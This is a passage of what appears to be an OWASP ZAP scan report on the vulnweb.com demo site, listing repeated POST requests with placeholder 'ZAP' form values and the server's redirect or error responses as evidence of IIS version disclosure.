Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=36 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=36">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=37 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=37">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=38 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=38">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=39 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=39">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=4 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=4">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=40 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=40">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=5 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=5">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=6 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=6">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=7 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=7">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=8">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=9 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=9">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 499 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 234 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Templatize.asp?item=html/about.html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 157 |
| Response Body - size: 157 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Templatize.asp?item=html/about.html">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 445 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
